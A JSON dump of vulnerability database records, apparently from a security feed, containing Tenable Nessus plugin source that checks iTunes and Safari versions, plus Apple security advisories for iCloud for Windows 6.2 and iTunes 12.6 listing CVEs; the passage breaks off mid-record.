script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type == 'AppleTV') audit(AUDIT_OS_NOT, \"Windows or Mac OS\");\n\nfixed_version = \"12.6\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xss:TRUE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T14:22:53", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 10.1. It is, therefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds read error exists in WebKit when handling certain JavaScript code. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when handling certain regular expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to exhaust available memory resources. (CVE-2016-9643)\n\n - Multiple information disclosure vulnerabilities exist in WebKit when handling page loading due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to disclose data cross-origin. (CVE-2017-2364, CVE-2017-2367)\n\n - An unspecified state management flaw exists that allows an unauthenticated, remote attacker to spoof the address bar. (CVE-2017-2376)\n\n - A denial of service vulnerability exists in the Web Inspector component when closing a window while the debugger is paused. An unauthenticated, remote attacker can exploit this to terminate the application.\n (CVE-2017-2377)\n\n - An unspecified flaw exists in WebKit when creating bookmarks using drag-and-drop due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted link, to spoof bookmarks or potentially execute arbitrary code.\n (CVE-2017-2378)\n\n - An information disclosure vulnerability exists in the Login AutofFill component that allows a local attacker to access keychain items. (CVE-2017-2385)\n\n - Multiple information disclosure vulnerabilities exist in WebKit when handling unspecified exceptions or elements. An unauthenticated, remote attacker can exploit these, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2386, CVE-2017-2479, CVE-2017-2480)\n\n - An unspecified flaw exists in the handling of HTTP authentication that allows an unauthenticated, remote attacker to disclose authentication sheets on arbitrary websites or cause a denial of service condition.\n (CVE-2017-2389)\n\n - Multiple memory corruption issues exist in WebKit that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2433, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in WebKit within the Web Inspector component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2405)\n\n - An unspecified type confusion error exists that allows an unauthenticated remote attacker to execute arbitrary code by using specially crafted web content.\n (CVE-2017-2415)\n\n - A security bypass vulnerability exists in WebKit that allows an unauthenticated, remote attacker to bypass the Content Security Policy by using specially crafted web content. (CVE-2017-2419)\n\n - An unspecified flaw exists in WebKit when handling OpenGL shaders that allows an unauthenticated, remote attacker to disclose process memory content by using specially crafted web content. (CVE-2017-2424)\n\n - An information disclosure vulnerability exists in WebKit JavaScript Bindings when handling page loading due to unspecified logic flaws. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2442)\n\n - A memory corruption issue exists in WebKit within the CoreGraphics component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frame objects due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions that are called from built-in strict mode scripts not being properly restricted from calling sensitive native functions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose memory contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in FaceTime prompt handling due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to spoof user interface elements. (CVE-2017-2453)\n\n - A use-after-free error exists in WebKit when handling RenderBox objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2463)\n\n - An unspecified use-after-free error exists in WebKit that allows an unauthenticated, remote attacker, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2471)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frames due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2475)\n\n - A use-after-free error exists in WebKit when handling ElementData objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2481)\n\n - A use-after-free error exists in JavaScriptCore when handling the String.replace() method. An unauthenticated, remote attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability exists in JavaScriptCore due to an unspecified prototype flaw. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session.\n (CVE-2017-2492)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-03T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 10.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2385", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2486", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-7071"], "modified": "2019-07-03T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI10_1.NASL", "href": "https://www.tenable.com/plugins/nessus/99167", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99167);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/03 12:01:40\");\n\n script_cve_id(\n \"CVE-2016-9642\",\n \"CVE-2016-9643\",\n \"CVE-2017-2364\",\n \"CVE-2017-2367\",\n \"CVE-2017-2376\",\n \"CVE-2017-2377\",\n \"CVE-2017-2378\",\n \"CVE-2017-2385\",\n \"CVE-2017-2386\",\n \"CVE-2017-2389\",\n \"CVE-2017-2392\",\n \"CVE-2017-2394\",\n \"CVE-2017-2395\",\n \"CVE-2017-2396\",\n \"CVE-2017-2405\",\n \"CVE-2017-2415\",\n \"CVE-2017-2419\",\n \"CVE-2017-2424\",\n \"CVE-2017-2433\",\n \"CVE-2017-2442\",\n \"CVE-2017-2444\",\n \"CVE-2017-2445\",\n \"CVE-2017-2446\",\n \"CVE-2017-2447\",\n \"CVE-2017-2453\",\n \"CVE-2017-2454\",\n \"CVE-2017-2455\",\n \"CVE-2017-2457\",\n \"CVE-2017-2459\",\n \"CVE-2017-2460\",\n \"CVE-2017-2463\",\n \"CVE-2017-2464\",\n \"CVE-2017-2465\",\n \"CVE-2017-2466\",\n \"CVE-2017-2468\",\n \"CVE-2017-2469\",\n \"CVE-2017-2470\",\n \"CVE-2017-2471\",\n \"CVE-2017-2475\",\n \"CVE-2017-2476\",\n \"CVE-2017-2479\",\n \"CVE-2017-2480\",\n \"CVE-2017-2481\",\n \"CVE-2017-2486\",\n \"CVE-2017-2491\",\n \"CVE-2017-2492\",\n \"CVE-2017-2493\",\n \"CVE-2017-7071\"\n );\n script_bugtraq_id(\n 100613,\n 94554,\n 94559,\n 95725,\n 97129,\n 97130,\n 97131,\n 97133,\n 97136,\n 97140,\n 97143,\n 97147,\n 97176,\n 98316,\n 98700\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-2\");\n\n script_name(english:\"macOS : Apple Safari < 10.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X \nhost is prior to 10.1. It is, therefore, affected by multiple\nvulnerabilities:\n\n - An out-of-bounds read error exists in WebKit when\n handling certain JavaScript code. An unauthenticated,\n remote attacker can exploit this to cause a denial of\n service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when\n handling certain regular expressions. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to exhaust available memory\n resources. (CVE-2016-9643)\n\n - Multiple information disclosure vulnerabilities exist\n in WebKit when handling page loading due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit these to disclose data\n cross-origin. (CVE-2017-2364, CVE-2017-2367)\n\n - An unspecified state management flaw exists that allows\n an unauthenticated, remote attacker to spoof the address\n bar. (CVE-2017-2376)\n\n - A denial of service vulnerability exists in the Web\n Inspector component when closing a window while the\n debugger is paused. An unauthenticated, remote attacker\n can exploit this to terminate the application.\n (CVE-2017-2377)\n\n - An unspecified flaw exists in WebKit when creating\n bookmarks using drag-and-drop due to improper validation\n of certain input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted link, to spoof\n bookmarks or potentially execute arbitrary code.\n (CVE-2017-2378)\n\n - An information disclosure vulnerability exists in the\n Login AutofFill component that allows a local attacker\n to access keychain items. (CVE-2017-2385)\n\n - Multiple information disclosure vulnerabilities exist\n in WebKit when handling unspecified exceptions or\n elements. An unauthenticated, remote attacker can\n exploit these, via specially crafted web content, to\n disclose data cross-origin. (CVE-2017-2386,\n CVE-2017-2479, CVE-2017-2480)\n\n - An unspecified flaw exists in the handling of HTTP\n authentication that allows an unauthenticated, remote\n attacker to disclose authentication sheets on arbitrary\n websites or cause a denial of service condition.\n (CVE-2017-2389)\n\n - Multiple memory corruption issues exist in WebKit that\n allow an unauthenticated, remote attacker to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-2394, CVE-2017-2395,\n CVE-2017-2396, CVE-2017-2433, CVE-2017-2454,\n CVE-2017-2455, CVE-2017-2459, CVE-2017-2460,\n CVE-2017-2464, CVE-2017-2465, CVE-2017-2466,\n CVE-2017-2468, CVE-2017-2469, CVE-2017-2470,\n CVE-2017-2476)\n\n - A memory corruption issue exists in WebKit within the\n Web Inspector component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2017-2405)\n\n - An unspecified type confusion error exists that allows\n an unauthenticated remote attacker to execute arbitrary\n code by using specially crafted web content.\n (CVE-2017-2415)\n\n - A security bypass vulnerability exists in WebKit that\n allows an unauthenticated, remote attacker to bypass the\n Content Security Policy by using specially crafted web\n content. (CVE-2017-2419)\n\n - An unspecified flaw exists in WebKit when handling\n OpenGL shaders that allows an unauthenticated, remote\n attacker to disclose process memory content by using\n specially crafted web content. (CVE-2017-2424)\n\n - An information disclosure vulnerability exists in WebKit\n JavaScript Bindings when handling page loading due to\n unspecified logic flaws. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to disclose data cross-origin. (CVE-2017-2442)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions\n that are called from built-in strict mode scripts not\n being properly restricted from calling sensitive native\n functions. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when\n handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted web content, to disclose memory\n contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in FaceTime prompt handling\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n spoof user interface elements. (CVE-2017-2453)\n\n - A use-after-free error exists in WebKit when handling\n RenderBox objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2463)\n\n - An unspecified use-after-free error exists in WebKit\n that allows an unauthenticated, remote attacker, via\n specially crafted web content, to dereference already\n freed memory, resulting in the execution of arbitrary\n code. (CVE-2017-2471)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frames due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2475)\n\n - A use-after-free error exists in WebKit when handling\n ElementData objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2481)\n\n - A use-after-free error exists in JavaScriptCore when\n handling the String.replace() method. An\n unauthenticated, remote attacker can exploit this to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in JavaScriptCore due to an unspecified prototype\n flaw. An unauthenticated, remote attacker can exploit\n this, via a specially crafted web page, to execute\n arbitrary code in a user's browser session.\n (CVE-2017-2492)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207600\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6d82a85\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 10.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2378\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.(10|11|12)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, 'Mac OS X Yosemite 10.10 / Mac OS X El Capitan 10.11 / macOS Sierra 10.12');\n\nget_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '10.1';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2021-11-10T17:00:51", "description": "# About the security content of iCloud for Windows 6.2\n\nThis document describes the security content of iCloud for Windows 6.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2\n\nReleased March 28, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 24, 2017\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-28T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 6.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-28T00:00:00", "id": "APPLE:20D403FA17FFAFBF6C005DAD59ACB4F6", "href": "https://support.apple.com/kb/HT207607", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:27", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2\n\nReleased March 28, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-24T06:47:37", "title": "About the security content of iCloud for Windows 6.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "modified": "2017-04-24T06:47:37", "id": "APPLE:HT207607", "href": "https://support.apple.com/kb/HT207607", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:44:14", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.6 for Windows\n\nReleased March 21, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\nEntry added March 28, 2017\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple issues in SQLite\n\nDescription: Multiple issues existed in SQLite. These issues were addressed by updating SQLite to version 3.15.2.\n\nCVE-2013-7443\n\nCVE-2015-3414\n\nCVE-2015-3415\n\nCVE-2015-3416\n\nCVE-2015-3717\n\nCVE-2015-6607\n\nCVE-2016-6153\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple issues in expat\n\nDescription: Multiple issues existed in expat. These issues were addressed by updating expat to version 2.2.0.\n\nCVE-2009-3270\n\nCVE-2009-3560\n\nCVE-2009-3720\n\nCVE-2012-1147\n\nCVE-2012-1148\n\nCVE-2012-6702\n\nCVE-2015-1283\n\nCVE-2016-0718\n\nCVE-2016-4472\n\nCVE-2016-5300\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-11T11:38:44", "title": "About the security content of iTunes 12.6 